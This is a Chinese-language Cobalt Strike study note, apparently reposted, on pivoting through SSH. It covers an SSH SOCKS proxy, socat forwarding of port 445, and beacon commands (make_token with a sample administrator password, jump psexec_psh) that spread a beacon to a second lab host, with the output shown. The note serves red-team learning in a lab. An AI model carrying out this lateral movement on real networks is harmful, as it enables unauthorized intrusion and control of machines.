0x00 前言

這一節將來介紹如何通過 SSH 通道進行攻擊。

0x01 通過 SSH 建立通道

1. 連接到上圖中藍色區域里的 PIVOT 主機并開啟端口轉發

ssh?-D?1080?user@<blue?pivot>

該命令中的 -D 參數會使 SSH 會建立一個 socket，并去監聽本地的 1080 端口，一旦有數據傳向那個端口，就自動把它轉移到 SSH 連接上面，隨后發往遠程主機。

2. 在紅色區域的 PIVOT 主機上開啟通過 SSH Socks 的 445 端口轉發

socat?TCP4-LISTEN:445,fork?SOCKS4:127.0.0.1:<target>:445

socat 可以理解成 netcat 的加強版。socat 建立 socks 連接默認端口就是 1080 ，由于我們上面設置的就是 1080，因此這里不需變動。如果設置了其他端口，那么這里還需要在命令最后加上 ,socksport= 指定端口才行。

3. 在攻擊者控制的主機上運行 beacon，使其上線

注意需要使用 administrator 權限運行 beacon

4. 在上線的主機上運行以下命令

make_token [DOMAIN\user] [password]jump?psexec_psh?<red?pivot>?[listener]

整體的流程就是下面這張圖一樣。

0x02 演示

我在本地搭建了這樣的一個環境。

1. 首先使 Win1 主機上線，接著在 Linux1 主機上通過 SSH 連接到 Linux2 主機。

ssh?-D?1080?user@192.168.175.146> ssh -D 1080 user@192.168.175.146user@192.168.175.146's password: Last login: Fri Jul 31 20:00:54 2020 from 192.168.175.1user@ubuntu:~$

2. 在 Linux1 主機上開啟 445 端口轉發

socat TCP4-LISTEN:445,fork SOCKS4:127.0.0.1:192.168.232.132:445

3. 在 Win1 主機上運行以下命令使 Win2 上線

make_token teamssix\administrator Test123!jump?psexec_psh?192.168.175.200?smbbeacon> make_token teamssix\administrator Test123![*] Tasked beacon to create a token for teamssix\administrator[+] host called home, sent: 61 bytes[+] Impersonated WINTEST\Administratorbeacon> jump psexec_psh 192.168.175.200 smb[*] Tasked beacon to run windows/beacon_bind_pipe (\\.\pipe\msagent_532c) on 192.168.175.200 via Service Control Manager (PSH)[+] host called home, sent: 5886 bytes[+] received output:Started service 4aea3b9 on 192.168.175.200[+] host called home, sent: 204473 bytes[+]?established?link?to?child?beacon:?192.168.232.132

4. 隨后便可以看到通過 SSH 上線的主機

原文鏈接：https://www.teamssix.com/year/200419-150657.html
參考鏈接：

https://payloads.online/tools/socat

https://www.bilibili.com/video/BV16b411i7n5

https://blog.csdn.net/pipisorry/article/details/52269785

---

---

往期推薦

CS學習筆記 | 21、反向轉發通道的建立

CS學習筆記 | 20、通過Socks轉發的方法

CS學習筆記 | 19、代碼執行的方式

總結

以上是生活随笔為你收集整理的ubuntu 开启ssh_CS学习笔记 | 22、通过SSH开通通道的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。